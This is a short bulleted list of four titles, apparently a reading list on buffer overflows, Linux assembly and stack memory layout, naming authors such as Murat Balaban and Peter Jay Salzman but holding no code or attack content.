  • Buffer Overflows Demystified by Murat Balaban
  • Introduction to Buffer Overflow by Ghost_Rider
  • Linux Assembly
  • Memory Layout and the Stack By Peter Jay Salzman